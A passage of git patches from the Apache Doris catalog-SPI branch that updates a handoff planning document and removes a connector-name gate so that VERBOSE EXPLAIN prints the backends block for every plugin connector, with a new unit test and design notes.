`hadoop.config.resources` XML into FE catalog-create Configuration (MAJOR) — **DONE** + — `HdfsFileSystemProperties implements HadoopStorageProperties`; FE `toHadoopConfigurationMap()` returns a + **defaults-free** map (XML + HA + auth keys, no Hadoop framework defaults) so it never clobbers a co-bound + object-store provider's tuned `fs.s3a.*` (multi-backend clobber found by design red-team, empirically + verified on hadoop 3.4.2); BE `toMap()` stays defaults-laden (byte-parity). Parity for filesystem/jdbc/hms; + DLF deviation = `DV-036` (accept). 28/0 fe-filesystem-hdfs UT + 279/0/1skip paimon + connector glue test; + checkstyle + import-check clean; e2e gated/not-run. See FIX-C2-HDFS-XML-{design,summary}.md. - [ ] **P6-R3-residual** drop `"paimon".equals` gate on `appendBackendScanRangeDetail`; emit unconditionally under VERBOSE (fixes MaxCompute regression + generic-node-no-source-branch rule + false comment). - [ ] **P6-R1-table** bridge `createTable`: add `remoteExists && !ifNotExists` arm → `ERR_TABLE_EXISTS_ERROR` (1050). From b3da48215fcd5d88e4a068672d1cd8aba3db88ee Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 00:59:37 +0800 Subject: [PATCH 103/128] =?UTF-8?q?docs(catalog-spi):=20P6=20C2=20HDFS=20X?= =?UTF-8?q?ML=20fix=20done=20=E2=86=92=20HANDOFF=20next=20=3D=20R3-residua?= =?UTF-8?q?l?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 35 +++++++++++++++++++---------------- 1 file changed, 19 insertions(+), 16 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 9e67ec6d056324..e609d33ff527e6 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -6,19 +6,22 @@ --- -# 🎯 下一个 session 的任务 — **P6 修复进行中:C1 DONE → 下一个 = C2 (HDFS XML)** +# 🎯 下一个 session 的任务 — **P6 修复进行中:C2 DONE → 下一个 = R3-residual (MINOR)** -> **进度(2026-06-18)**:P6 发现项按 `task-list-P6-fixes.md` 的 prioritized list 逐个修(单任务循环: +> **进度(2026-06-19)**:P6 发现项按 `task-list-P6-fixes.md` 的 prioritized list 逐个修(单任务循环: > design → 红队 → 实现 → impl 验证 → build+UT → commit)。 -> **✅ C1 (MinIO, MAJOR) 已完成并提交 `9967846ef64`**:minio.* 别名进**共享** `fe-filesystem-s3` -> (`S3FileSystemProperties` 各字段 names() 末尾追加 minio.* + `S3FileSystemProvider` 三个检测数组), -> **保留 legacy MinIO tuning 默认 100/10000/10000**(gated `applyLegacyMinioTuningDefaults()` 在 normalize 钩子里, -> 按 raw-key 存在判定→显式值仍优先;s3.* 路 byte-parity 不动);region us-east-1 由既有 endpoint-only 分支保留。 -> 28/0/0 UT,BUILD SUCCESS,checkstyle 干净;**docker e2e(`enablePaimonTest`)未跑**。 -> 设计/红队结论详见 `designs/FIX-C1-MINIO-{design,summary}.md`(红队**推翻**了首版「接受 tuning 偏离」→改为保留)。 -> **下一个 = C2 (HDFS `hadoop.config.resources` XML, MAJOR)**:filesystem/jdbc flavor 把 XML 载入 FE 建表 -> Configuration(荐 `HdfsFileSystemProperties` 暴露已载入 backend map);**仅 XML 子项**(kerberos-by-alias 已证非负载性)。 -> 然后 5 个 MINOR(R3-residual / R1-table / C4 / R2-catalog / R3-catalog),最后 accept-as-deviation 批次。 +> **✅ C1 (MinIO, MAJOR) 已完成 `9967846ef64`**(minio.* 别名进共享 fe-filesystem-s3 + 保留 tuning 默认)。 +> **✅ C2 (HDFS XML, MAJOR) 已完成并提交 `e95128aed5b`**:`HdfsFileSystemProperties implements HadoopStorageProperties`; +> FE `toHadoopConfigurationMap()` 返回**defaults-free** 图(XML+HA+auth 键,`new Configuration(false)`,无 Hadoop 框架默认), +> BE `toMap()` 仍 defaults-laden(byte-parity)。**defaults-free 是红队关键发现**:naive 全 `backendConfigProperties` 带 62 个 +> `fs.s3a.*` 默认,多后端(对象存储+HDFS-XML)会把 HDFS 默认 `fs.s3a.path.style.access=false` 盖掉 S3/MinIO 的 tuned `true` +> (相对当前分支的回归;hadoop 3.4.2 实测证实)。filesystem/jdbc/hms parity;DLF 偏差 accept(`DV-036`); +> `fs.hdfs.impl.disable.cache` pre-existing 缺口(`DV-037`,非 C2 引入,out-of-scope)。另修 4 处过时注释。 +> 28/0 fe-filesystem-hdfs UT + 279/0/1skip paimon + 连接器端到端 glue test;checkstyle+import-check 干净;**docker e2e 未跑**。 +> 设计/红队/impl-verify 结论详见 `designs/FIX-C2-HDFS-XML-{design,summary}.md`(一道 design 红队 6 agent + 一道 impl 对抗验证)。 +> **下一个 = R3-residual (MINOR)**:去 `PluginDrivenScanNode` 的 `"paimon".equals(catalog.getType())` gate,VERBOSE 下 +> 无条件 emit `appendBackendScanRangeDetail()`(同时修 MaxCompute VERBOSE 回归 + 违反「generic node 不按 source name 分支」规则 + 假注释)。 +> 然后 4 个 MINOR(R1-table / C4 / R2-catalog / R3-catalog),最后 accept-as-deviation 批次。 paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口线,2 波,零历史先验)**已完成**。 报告:[`reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md`](./reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md)(未跟踪,待 vet+commit)。 @@ -50,10 +53,10 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 0. **修复 P6 发现项**(报告 §Coverage gaps & follow-ups → prioritized fix-task list;每个独立 fix task; 逐项进度见 `task-list-P6-fixes.md`): - ✅ **C1 MinIO**(MAJOR)— **DONE `9967846ef64`**(minio.* 别名进共享 fe-filesystem-s3 + 保留 tuning 默认;28/0/0 UT)。 - - **C2 HDFS XML**(MAJOR):filesystem/jdbc flavor 把 `hadoop.config.resources` XML 载入 FE 建表 Configuration(推荐让 - `HdfsFileSystemProperties` 实现 `HadoopStorageProperties` 暴露已载入的 backend map,复用 BE 路那张图)。**仅 XML 子项** - (kerberos-alias 已证非负载性)。 - - **R3 residual**(MINOR):去 `PluginDrivenScanNode` 的 `"paimon".equals(catalog.getType())` gate,VERBOSE 下无条件 + - ✅ **C2 HDFS XML**(MAJOR)— **DONE `e95128aed5b`**(`HdfsFileSystemProperties implements HadoopStorageProperties`; + FE `toHadoopConfigurationMap()` 返 **defaults-free** 图避免多后端 `fs.s3a.*` clobber,BE `toMap()` 仍 defaults-laden; + DLF=DV-036、disable-cache=DV-037;28/0+279/0/1skip+glue test)。 + - **R3 residual**(MINOR,下一个):去 `PluginDrivenScanNode` 的 `"paimon".equals(catalog.getType())` gate,VERBOSE 下无条件 emit `appendBackendScanRangeDetail()`(同时修 MaxCompute VERBOSE 回归 + 违反「generic node 不按 source name 分支」规则 + 假注释)。 - **R1 table**(MINOR):bridge `createTable` 补 `remoteExists && !ifNotExists` 臂报 `ERR_TABLE_EXISTS_ERROR`(1050)。 - **C4 / R2-catalog / R3-catalog**(MINOR,可合一):HMS socket timeout 透传 `hive_metastore_client_timeout_second` / @@ -81,7 +84,7 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 --- # 📦 仓库 / 进度状态 -- **HEAD = `9967846ef64`**(P6 修复 C1 MinIO;前序 `13d3876d25d` 元存储子线 P1-T07 删 fe-property 孤儿模块)。当前分支 **`catalog-spi-07-paimon`**(非 master); +- **HEAD = `e95128aed5b`**(P6 修复 C2 HDFS XML;前序 `9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); 已同步 push 到 `master-catalog-spi-07-paimon`(= PR [#64445](https://github.com/apache/doris/pull/64445) head, force-with-lease)。 - **主线(P0–P5)**:paimon connector SPI cutover + round-3 clean-room review 的 4 个 user-approved fix 全完成 From 44499f073e8b3022cb9f142de5697eb6b7da005e Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 08:52:13 +0800 Subject: [PATCH 104/128] =?UTF-8?q?fix:=20FIX-R3-RESIDUAL=20=E2=80=94=20em?= =?UTF-8?q?it=20VERBOSE=20backends=20block=20for=20every=20plugin=20connec?= =?UTF-8?q?tor=20(drop=20"paimon".equals=20gate)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: PluginDrivenScanNode.getNodeExplainString (the generic SPI scan node) reimplements the FileScanNode explain body (no super call) and re-emitted the VERBOSE per-backend "backends:" block only when `"paimon".equals(catalog.getType())`. The parent FileScanNode emits it unconditionally under `VERBOSE && !isBatchMode()`. The source-name gate (FIX-PAIMON-EXPLAIN-GAP d4526013364) (1) regressed cut-over MaxCompute / TrinoConnector VERBOSE EXPLAIN — both legacy nodes extended FileQueryScanNode and inherited the unconditional block; (2) violated the project rule that the generic node must not branch on a connector source name; (3) carried a false comment claiming es/jdbc/max_compute output stayed byte-unchanged. Solution: remove the `&& "paimon".equals(...getType())` conjunct so the gate is `VERBOSE && !isBatchMode()`, identical to the parent FileScanNode; rewrite the inline comment. paimonNativeReadSplits stays behind the SPI ConnectorScanPlanProvider.appendExplainInfo delegation (unchanged). Scope (design red-team wf_3518653b-3cb corrected, broader than the review's "maxcompute" framing): SPI_READY_TYPES = {jdbc, es, trino-connector, max_compute, paimon} all route through this node. paimon unchanged; maxcompute/trino-connector parity-RESTORED; es/jdbc gain new, NPE-safe, rule-mandated VERBOSE output (same category as the sibling partition=N/M and pushdown agg= lines already emitted unconditionally for them). NPE-safe because PluginDrivenScanNode produces only PluginDrivenSplit (extends FileSplit) -> always a FileScanRange, and getDeleteFiles is null-guarded; es/jdbc render synthetic per-split paths (es://idx/shard, jdbc://virtual). Diagnostic-only (VERBOSE EXPLAIN text); no query/data impact; no regression test pins these connectors' VERBOSE EXPLAIN text. The sibling "es_http" `ES terminate_after:` gate is left as a separate residual (R3-LAYER-2; keys on file-format-type, not getType()). Tests: new PluginDrivenScanNodeVerboseExplainTest (3 tests, CALLS_REAL_METHODS + Deencapsulation partial-node pattern, empty scanRangeLocations -> only the bare backends: header prints): non-paimon (max_compute) VERBOSE emits backends:, paimon still emits, NORMAL omits. RED->GREEN verified empirically: re-adding the gate turns the non-paimon test red (max_compute output lacks backends:). 45/0/0 PluginDrivenScanNode* UT + checkstyle clean; e2e gated/not-run. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../datasource/PluginDrivenScanNode.java | 25 ++- ...luginDrivenScanNodeVerboseExplainTest.java | 134 ++++++++++++++ plan-doc/designs/FIX-R3-RESIDUAL-design.md | 165 ++++++++++++++++++ plan-doc/designs/FIX-R3-RESIDUAL-summary.md | 67 +++++++ plan-doc/task-list-P6-fixes.md | 9 +- 5 files changed, 389 insertions(+), 11 deletions(-) create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeVerboseExplainTest.java create mode 100644 plan-doc/designs/FIX-R3-RESIDUAL-design.md create mode 100644 plan-doc/designs/FIX-R3-RESIDUAL-summary.md diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java index 9fb9106d26854e..ec94773dde0dd1 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java @@ -296,15 +296,22 @@ public String getNodeExplainString(String prefix, TExplainLevel detailLevel) { // getSplits()/startSplit() (see setSelectedPartitions). output.append(prefix).append("partition=").append(selectedPartitionNum) .append("/").append(totalPartitionNum).append("\n"); - // FIX-E (explain gap): the VERBOSE per-backend block (dataFileNum/deleteFileNum/ - // deleteSplitNum) lives in the parent FileScanNode but this override does not call super, - // so re-emit it under the same VERBOSE && !isBatchMode() gate. GATED to paimon (the only - // connector with merge-on-read delete files surfaced via getDeleteFiles) so es/jdbc/ - // max_compute VERBOSE output stays byte-unchanged. Emitted before the connector explain so - // the block ordering matches the legacy PaimonScanNode (FileScanNode body, then paimon's). - if (detailLevel == TExplainLevel.VERBOSE && !isBatchMode() - && "paimon".equals( - desc.getTable().getDatabase().getCatalog().getType())) { + // FIX-E / FIX-R3-RESIDUAL (explain gap): the VERBOSE per-backend block (the backends: list, + // per-file "path start/length" lines, and dataFileNum/deleteFileNum/deleteSplitNum) lives in + // the parent FileScanNode but this override does not call super, so re-emit it under the SAME + // gate the parent uses: VERBOSE && !isBatchMode() (FileScanNode#getNodeExplainString). Emitted + // UNCONDITIONALLY for every plugin connector -- like the sibling inputSplitNum / partition=N/M + // (above) and pushdown agg= (below) lines -- because it is universal FileScanNode info, not + // connector-specific: NO source-name branch belongs in this generic node (a "paimon".equals( + // getType()) gate here previously dropped it for non-paimon connectors). This RESTORES the + // block that legacy MaxComputeScanNode / TrinoConnectorScanNode inherited from FileScanNode + // pre-cutover, and is consistent for every FILE_SCAN plugin connector (es/jdbc render their + // synthetic per-split path; connectors with no delete files render deleteFileNum=0 via + // getDeleteFiles -> empty). Connector-SPECIFIC EXPLAIN stays delegated to + // ConnectorScanPlanProvider.appendExplainInfo below; this block is emitted before that + // delegation so the ordering matches the legacy PaimonScanNode (FileScanNode body, then the + // connector's lines). + if (detailLevel == TExplainLevel.VERBOSE && !isBatchMode()) { appendBackendScanRangeDetail(output, prefix); } // Delegate connector-specific EXPLAIN info to the SPI. Thread the native/total split counts diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeVerboseExplainTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeVerboseExplainTest.java new file mode 100644 index 00000000000000..4f171e065d898c --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeVerboseExplainTest.java @@ -0,0 +1,134 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.analysis.TupleDescriptor; +import org.apache.doris.analysis.TupleId; +import org.apache.doris.catalog.DatabaseIf; +import org.apache.doris.catalog.TableIf; +import org.apache.doris.common.jmockit.Deencapsulation; +import org.apache.doris.connector.api.Connector; +import org.apache.doris.thrift.TExplainLevel; +import org.apache.doris.thrift.TPushAggOp; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.util.ArrayList; +import java.util.Collections; + +/** + * FIX-R3-RESIDUAL — guards that the VERBOSE per-backend {@code backends:} block in + * {@link PluginDrivenScanNode#getNodeExplainString} is emitted for EVERY plugin connector, NOT gated to a + * hardcoded source name. + * + *

    Why this matters (Rule 9 — tests encode WHY): the {@code backends:} block (the per-backend + * scan-range detail with {@code dataFileNum/deleteFileNum/deleteSplitNum}) is universal {@link FileScanNode} + * behavior: the parent emits it unconditionally under {@code VERBOSE && !isBatchMode()} + * ({@code FileScanNode#getNodeExplainString}). This override does not call super, and previously re-emitted + * the block only when {@code "paimon".equals(catalog.getType())}. That source-name gate (a) regressed + * cut-over MaxCompute VERBOSE EXPLAIN (legacy {@code MaxComputeScanNode extends FileQueryScanNode} inherited + * the unconditional block) and (b) violated the project rule that the generic SPI node must not branch on a + * connector source name. After cut-over, jdbc/es/trino-connector/max_compute/paimon all route through this + * node ({@code SPI_READY_TYPES}); the block must appear for all of them.

    + * + *

    MUTATION killed: re-introducing {@code && "paimon".equals(desc.getTable().getDatabase() + * .getCatalog().getType())} makes a non-paimon catalog (here {@code max_compute}) skip the block, so + * {@code "backends:"} disappears from VERBOSE EXPLAIN → {@link #verboseEmitsBackendsBlockForNonPaimonConnector} + * goes red. {@link #nonVerboseOmitsBackendsBlock} pins the surviving {@code VERBOSE} gate so a mutant that + * drops the level check (always emitting the block) is also killed.

    + * + *

    Driven on a {@code CALLS_REAL_METHODS} mock with only the fields the explain path reads injected (the + * same partial-node technique as {@code PluginDrivenScanNodeDeleteFilesTest}; full {@code create(...)} + * construction is unnecessary). {@code scanRangeLocations} is left EMPTY: the per-backend loop is then + * skipped and only the unconditional bare {@code backends:} header is emitted, so no synthetic + * {@code FileScanRange} plumbing is needed and the deref chain inside the loop never runs.

    + */ +public class PluginDrivenScanNodeVerboseExplainTest { + + /** + * A {@code CALLS_REAL_METHODS} node whose {@code desc} resolves to a table on a catalog of + * {@code catalogType}, with empty scan ranges / conjuncts and {@code isBatchMode()==false}, so + * {@code getNodeExplainString} runs its full table-scan (else) branch without I/O or NPE. + */ + private static PluginDrivenScanNode nodeForCatalogType(String catalogType) { + PluginDrivenScanNode node = Mockito.mock(PluginDrivenScanNode.class, Mockito.CALLS_REAL_METHODS); + + TableIf table = Mockito.mock(TableIf.class); + DatabaseIf db = Mockito.mock(DatabaseIf.class); + CatalogIf catalog = Mockito.mock(CatalogIf.class); + Mockito.when(table.getNameWithFullQualifiers()).thenReturn(catalogType + "_ctl.db.tbl"); + Mockito.when(table.getDatabase()).thenReturn(db); + Mockito.when(db.getCatalog()).thenReturn(catalog); + Mockito.when(catalog.getType()).thenReturn(catalogType); + TupleDescriptor desc = new TupleDescriptor(new TupleId(0)); + desc.setTable(table); + + Deencapsulation.setField(node, "desc", desc); + // Mockito skips the constructor, so field initializers do not run -> set the non-null fields the + // explain path reads. Empty scanRangeLocations => the per-backend loop body is skipped. + Deencapsulation.setField(node, "conjuncts", new ArrayList<>()); + Deencapsulation.setField(node, "scanRangeLocations", new ArrayList<>()); + // useTopnFilter() runs at the method tail (common to both EXPLAIN paths) and derefs this list. + Deencapsulation.setField(node, "topnFilterSortNodes", new ArrayList<>()); + // Pre-seed the cache so getOrLoadScanNodeProperties() returns it without contacting the connector. + Deencapsulation.setField(node, "scanNodeProperties", Collections.emptyMap()); + // Pre-seed the isBatchMode cache so the gate's !isBatchMode() is deterministic (no computeBatchMode). + Deencapsulation.setField(node, "isBatchModeCache", Boolean.FALSE); + Deencapsulation.setField(node, "connector", Mockito.mock(Connector.class)); + Deencapsulation.setField(node, "pushDownAggNoGroupingOp", TPushAggOp.NONE); + return node; + } + + @Test + public void verboseEmitsBackendsBlockForNonPaimonConnector() { + // max_compute is the connector that actually regressed at cut-over (legacy MaxComputeScanNode + // inherited the unconditional FileScanNode block); the same holds for es/jdbc/trino-connector. + PluginDrivenScanNode node = nodeForCatalogType("max_compute"); + + String explain = node.getNodeExplainString("", TExplainLevel.VERBOSE); + + Assertions.assertTrue(explain.contains("backends:"), + "VERBOSE EXPLAIN must emit the universal FileScanNode backends: block for a non-paimon " + + "plugin connector (no source-name gate). Actual:\n" + explain); + } + + @Test + public void verboseEmitsBackendsBlockForPaimon() { + // Parity guard: removing the gate must NOT drop the block for paimon (it stays emitted). + PluginDrivenScanNode node = nodeForCatalogType("paimon"); + + String explain = node.getNodeExplainString("", TExplainLevel.VERBOSE); + + Assertions.assertTrue(explain.contains("backends:"), + "VERBOSE EXPLAIN must still emit the backends: block for paimon. Actual:\n" + explain); + } + + @Test + public void nonVerboseOmitsBackendsBlock() { + // Pins the surviving level gate: the block is VERBOSE-only. A mutant that emits it unconditionally + // (drops the TExplainLevel.VERBOSE check) would leak the block into NORMAL EXPLAIN -> red. + PluginDrivenScanNode node = nodeForCatalogType("max_compute"); + + String explain = node.getNodeExplainString("", TExplainLevel.NORMAL); + + Assertions.assertFalse(explain.contains("backends:"), + "NORMAL EXPLAIN must NOT emit the VERBOSE-only backends: block. Actual:\n" + explain); + } +} diff --git a/plan-doc/designs/FIX-R3-RESIDUAL-design.md b/plan-doc/designs/FIX-R3-RESIDUAL-design.md new file mode 100644 index 00000000000000..e0f812b4c07b42 --- /dev/null +++ b/plan-doc/designs/FIX-R3-RESIDUAL-design.md @@ -0,0 +1,165 @@ +# FIX-R3-RESIDUAL — drop the `"paimon".equals` gate on the VERBOSE backends block + +> Single-task loop (AGENT-PLAYBOOK): design → design red-team → implement → impl verify → build+UT → commit → summary. +> Source finding: `reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md` §R3 (MINOR, regression, partial→MINOR). +> Project rule: memory `catalog-spi-plugindriven-no-source-specific-code` (no source-name branches in the generic SPI node). + +# Problem + +`PluginDrivenScanNode.getNodeExplainString` (the generic SPI scan node) re-emits the VERBOSE per-backend +scan-range detail block (`backends:` + per-file `path start/length` lines + `dataFileNum/deleteFileNum/ +deleteSplitNum`) only when the catalog type is paimon: + +```java +// PluginDrivenScanNode.java:305-309 +if (detailLevel == TExplainLevel.VERBOSE && !isBatchMode() + && "paimon".equals( + desc.getTable().getDatabase().getCatalog().getType())) { + appendBackendScanRangeDetail(output, prefix); +} +``` + +Three defects: + +1. **MaxCompute VERBOSE EXPLAIN regression.** The parent `FileScanNode.getNodeExplainString` emits this + block **unconditionally** for `VERBOSE && !isBatchMode()` (`FileScanNode.java:151-153`). Legacy + `MaxComputeScanNode extends FileQueryScanNode extends FileScanNode` and did **not** override + `getNodeExplainString` (verified in git `73832991962^`: class decl only, no override) → it inherited the + unconditional block. After the SPI cutover MaxCompute routes through `PluginDrivenScanNode` + (`PhysicalPlanTranslator:737-746`, `instanceof PluginDrivenExternalTable`), whose override does NOT call + super and gates the block to paimon → cut-over MaxCompute VERBOSE EXPLAIN silently loses the block. +2. **Layering violation.** A hardcoded source-name branch (`"paimon".equals(...getType())`) in the generic + node shared by every SPI connector. Directly violates the project rule (memory + `catalog-spi-plugindriven-no-source-specific-code`): universal `FileScanNode` behavior must be emitted + unconditionally (like the sibling `inputSplitNum` / `partition=N/M` / `pushdown agg=` lines in this very + method), connector-specific behavior must delegate via `ConnectorScanPlanProvider.appendExplainInfo`. +3. **False comment.** The inline comment (`:299-304`) claims the gate keeps "es/jdbc/max_compute VERBOSE + output … byte-unchanged" — wrong: it is exactly what regresses MaxCompute. + +# Root Cause + +`PluginDrivenScanNode.getNodeExplainString` reimplements the `FileScanNode` body (custom +TABLE/CONNECTOR/QUERY/PREDICATES format, so it cannot call `super`) and re-emits each inherited line by +hand. For the VERBOSE backends block the re-emission was wrongly conjoined with a paimon source-name gate +(added by FIX-PAIMON-EXPLAIN-GAP `d4526013364`, with the stated but incorrect intent of "not perturbing +other connectors"), instead of mirroring the parent's gate verbatim (`VERBOSE && !isBatchMode()`). + +# Design + +Remove the `"paimon".equals(...)` conjunct. The remaining gate `detailLevel == VERBOSE && !isBatchMode()` +is then **identical to the parent `FileScanNode`'s** gate (`FileScanNode.java:151`). Replace the false +comment with the truthful "emit unconditionally for every plugin connector, like the sibling universal +lines" rationale. + +```java +if (detailLevel == TExplainLevel.VERBOSE && !isBatchMode()) { + appendBackendScanRangeDetail(output, prefix); +} +``` + +`paimonNativeReadSplits` stays where it is — behind the SPI `appendExplainInfo` delegation +(`:315-323`) — so connector-specific EXPLAIN remains connector-side. No change there. + +## Who is affected — CORRECTED after design red-team (`wf_3518653b-3cb`) + +> The first draft of this doc wrongly scoped the change to "paimon + maxcompute" and claimed "es/jdbc: not +> routed → no change". The red-team **refuted** that with code evidence and I verified it independently. + +`CatalogFactory.java:51`: `SPI_READY_TYPES = {"jdbc", "es", "trino-connector", "max_compute", "paimon"}` — +**all five** become `PluginDrivenExternalCatalog` → `PluginDrivenExternalTable` → routed to +`PluginDrivenScanNode` (`PhysicalPlanTranslator:737`). A plain `SELECT … FROM _catalog.db.tbl` +reaches the table-scan **else**-branch (only the jdbc-**TVF** uses `PassthroughQueryTableHandle` → the +**if**-branch, unaffected). `supportsBatchScan` defaults `false` (only MaxCompute overrides it), so +`!isBatchMode()` is true for es/jdbc → the gate fires. So removing the conjunct emits the `backends:` block +for **all 5** SPI connectors. + +## Why this is safe (no NPE) + +- **Always file-based ranges.** `PluginDrivenScanNode` produces only `PluginDrivenSplit` (`extends + FileSplit`), so every `scanRangeLocations` entry carries a populated `FileScanRange` — exactly what + `appendBackendScanRangeDetail` dereferences (`locations.getScanRange().getExtScanRange() + .getFileScanRange().getRanges()`). es/jdbc render a synthetic per-split path (`es:///`, + `jdbc://virtual`); no real file, but NPE-safe. (red-team C-SAFE: confirmed, 4 independent verifiers.) +- **`getDeleteFiles` null-guard.** The block calls `getDeleteFiles(rangeDesc)`; the override returns empty + for a range without table-format params and for a null provider (guarded + unit-tested in + `PluginDrivenScanNodeDeleteFilesTest`). Non-paimon ranges → `deleteFileNum=0`, no NPE. +- **Empty scan.** If `scanRangeLocations` is empty the loop body never runs → only a bare `backends:` line + is printed (same as the parent today). No regression vs `FileScanNode`. +- **Batch-mode.** The one range shape with a null `getRanges()` (split-source-only) exists only when + `isBatchMode()==true`, and the block stays gated by `!isBatchMode()` (cached, shared by both paths). + +## Parity / behavioral delta + +- **paimon:** unchanged (was already in the gate; still emitted; `test_paimon_deletion_vector_oss` still + asserts `deleteFileNum`). Byte-identical. +- **maxcompute & trino-connector:** the `backends:` block reappears under VERBOSE — **restores** pre-cutover + legacy behavior (both legacy nodes extended `FileQueryScanNode` and inherited the unconditional block). +- **es / jdbc:** **NEW** VERBOSE output — their legacy dedicated scan nodes (`EsScanNode` / + `JdbcScanNode`) did not emit a `FileScanNode` backends block. This is the rule-mandated, consistent + choice: it is the same category as the sibling universal lines (`partition=N/M`, `pushdown agg=`) that + this override **already** emits unconditionally for es/jdbc. Accepted (broadened scope, documented here + + in the commit message). No regression test pins these connectors' VERBOSE EXPLAIN text (red-team grep + + my independent grep both empty), so nothing breaks. +- **future hudi-SPI:** gains parity with every other `FileScanNode` (correct by the same rule). + +# Implementation Plan + +Single edit in `fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java`: +1. Replace the comment block `:299-304` (false "GATED to paimon … byte-unchanged" rationale) with the + truthful unconditional rationale. +2. Drop the `&& "paimon".equals(desc.getTable().getDatabase().getCatalog().getType())` conjunct + (`:306-307`), leaving `if (detailLevel == TExplainLevel.VERBOSE && !isBatchMode())`. + +No SPI signature change, no connector change, no BE change. + +# Risk Analysis + +- **Behavioral change is diagnostic-only** (EXPLAIN VERBOSE text); zero query/data-path impact (review §R3: + classification regression, severity MINOR). +- **Restoration, not new behavior**, for the only affected live connector (maxcompute). The block is the + same code path the parent runs for hive/iceberg/maxcompute-legacy. +- **No NPE risk** (file-based ranges + guarded `getDeleteFiles`), see above. +- **Risk if NOT done:** the source-name branch stands as precedent for the next SPI connector and the + MaxCompute EXPLAIN regression persists. + +# Test Plan + +## Unit Tests + +> **Decision REVISED after red-team (R3-TEST-1/2):** my first-draft "no UT feasible" claim was refuted. +> `PluginDrivenScanNodeSysHandleTest` already drives a real `PluginDrivenScanNode` end-to-end via +> `create(...)` with a `TestablePluginCatalog` whose catalog **type is a ctor param**, and the bare +> `backends:` header is emitted **unconditionally before** the per-backend loop — so with empty +> `scanRangeLocations` a node-level explain test is cheap and NPE-free. → **Add a UT.** + +New: `PluginDrivenScanNodeVerboseExplainTest` (mirrors the `CALLS_REAL_METHODS` + `Deencapsulation.setField` +partial-node technique of `PluginDrivenScanNodeDeleteFilesTest` — only the fields the explain path reads are +injected; `scanRangeLocations` empty so the loop is skipped): +- `verboseEmitsBackendsBlockForNonPaimonConnector` — catalog type `max_compute`, VERBOSE → output contains + `backends:`. **Kills the mutation**: re-adding `&& "paimon".equals(...getType())` drops the block for a + non-paimon catalog → red. +- `verboseEmitsBackendsBlockForPaimon` — parity guard: paimon still emits the block. +- `nonVerboseOmitsBackendsBlock` — NORMAL level → no `backends:` (pins the surviving `VERBOSE` gate). + +Existing tests stay relevant: `PluginDrivenScanNodeDeleteFilesTest` (NPE-safety of `getDeleteFiles`), +`PluginDrivenScanNodeExplainStatsTest` (static EXPLAIN accounting helpers). + +Regression gate: run the `fe-core` compile + the `org.apache.doris.datasource.PluginDrivenScanNode*` test +classes (must stay green) + the paimon connector module tests (no contract touched). + +## Out of scope (flagged by red-team, NOT fixed here) + +- **R3-LAYER-2:** a sibling connector-specific gate remains in this method — `"es_http".equals(props.get( + PROP_FILE_FORMAT_TYPE))` for the `ES terminate_after:` line (`~:336`) and the in-node ES limit pushdown. + It survives the no-source-name rule *literally* (it keys on a file-FORMAT-type property, not + `getCatalog().getType()`), but is the same *spirit* of in-node connector-specific EXPLAIN. Left as a + separate pre-existing residual for a future `ConnectorScanPlanProvider.appendExplainInfo` delegation; not + part of this one-conjunct fix. + +## E2E Tests + +- paimon: existing `test_paimon_deletion_vector_oss` (asserts `deleteFileNum` present) unchanged — gated + (`enablePaimonTest=false` default), not run locally. +- maxcompute: no regression test asserts `backends:` for maxcompute (review §R3), and maxcompute e2e needs + a real MaxCompute endpoint (gated/offline). Adding an e2e is out of reach in this environment → **none + added**; documented here (fail-loud, Rule 12). diff --git a/plan-doc/designs/FIX-R3-RESIDUAL-summary.md b/plan-doc/designs/FIX-R3-RESIDUAL-summary.md new file mode 100644 index 00000000000000..9d2709a013cfaa --- /dev/null +++ b/plan-doc/designs/FIX-R3-RESIDUAL-summary.md @@ -0,0 +1,67 @@ +# FIX-R3-RESIDUAL — Summary + +> Source finding: `reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md` §R3 (MINOR, regression). +> Design: `FIX-R3-RESIDUAL-design.md`. Design red-team: `wf_3518653b-3cb` (3 lenses, finder→verifier). + +## Problem + +`PluginDrivenScanNode.getNodeExplainString` (the generic SPI scan node) re-emitted the VERBOSE per-backend +`backends:` block (per-file path lines + 